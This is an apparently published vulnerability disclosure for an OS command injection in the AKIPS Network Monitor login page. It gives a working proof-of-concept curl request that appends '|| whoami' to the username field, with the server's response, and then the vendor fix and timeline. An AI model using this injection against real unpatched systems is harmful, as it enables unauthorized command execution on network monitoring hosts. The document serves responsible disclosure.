45 lines
No EOL
1.4 KiB
Text
45 lines
No EOL
1.4 KiB
Text
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
|
|
# Date: 03-14-2016
|
|
# Exploit Author: BrianWGray
|
|
# Contact: https://twitter.com/BrianWGray
|
|
# WebPage: http://somethingbroken.com/
|
|
# Vendor Homepage: https://www.akips.com/
|
|
# Software Link: https://www.akips.com/showdoc/download
|
|
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
|
|
# Tested on: FreeBSD 10.2-RELEASE-p7
|
|
# CVE : N/A
|
|
|
|
1. Description
|
|
|
|
The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
|
|
|
|
By using concatenation '||' a command may be appended to the username.
|
|
|
|
The vendor has stated the following:
|
|
"Apparently the issue is in a Perl module which does an open2() of a
|
|
custom PAM program. The command is not being properly sanitised." - Vendor Reply
|
|
|
|
http://somethingbroken.com/vuln/0002.html
|
|
|
|
2. Proof of Concept
|
|
|
|
example request:
|
|
|
|
curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
|
|
|
|
|
|
|
|
example response:
|
|
|
|
<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
|
|
|
|
|
|
3. Solution:
|
|
Update to version 16.6
|
|
https://www.akips.com/showdoc/download
|
|
|
|
|
|
4. Timeline:
|
|
|
|
* 03-14-2016: Discovered, Vendor Notified, Vendor Response
|
|
* 03-15-2016: Vendor Releases Remediated Build 16.6 |